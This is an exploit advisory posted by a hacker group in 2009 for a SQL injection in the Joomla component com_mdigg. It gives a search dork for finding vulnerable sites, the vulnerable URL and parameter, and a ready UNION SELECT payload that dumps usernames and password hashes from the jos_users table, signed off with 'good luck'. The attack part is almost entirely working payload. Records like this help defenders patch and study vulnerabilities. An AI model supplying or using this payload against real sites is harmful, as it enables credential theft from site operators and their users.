[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Joomla Component com_mdigg SQL Injection Vulnerability
# Published : 2009-12-31
# Author : wlhaan hacker
# Previous Title : Weatimages Directory Traversal and LFI Vulnerabilities
# Next Title : HLstatsX v1.65 SQL Injection Vulnerability
|| || | ||
o_,_7 _|| . _o_7 _|| 4_|_|| o_w_,
( : / (_) / ( .
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
| _ __ __ __ ______ |
| /' __ /'__` / __ /'__` / ___ |
| /_, ___ /_/_L ___ ,_/ / _ __ __/ |
| /_/ /' _ ` / /_/__<_ /'___ / /`'__ ___`` |
| / / / L / __/ _ _ / / L |
| _ _ __ ____/ ____\ __\ ____/ _ ____/ |
| /_//_//_/ _ /___/ /____/ /__/ /___/ /_/ /___/ |
| ____/ >> team wlhaan hacker |
| /___/ |
| |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
_____________________________________________________
Joomla Component com_mdigg(category) SQL-injection vulnerability
#####################################################
# [+] Author : wlhaan hacker #
# [+] Email : iit@HoTMaiL.coM #
# [+] Site : www.sa-hacker.com/vb #
# [+] team wlhaan Hacker #
# [+] Dork : "index.php?option=com_mdigg". #
# [+] ""
#####################################################
Example:
http://server/path/index.php?option=com_mdigg&act=story_lists&task=view&category=[exploit]
Exploit:
-9999/**/union/**/all/**/select/**/1,2,3,4,concat(username,0x3a,password),6,7,8,9,0,11,12,13/**/from/**/jos_users/*
and good luck :D
Thanks to : shooq hacker ..
#####################################################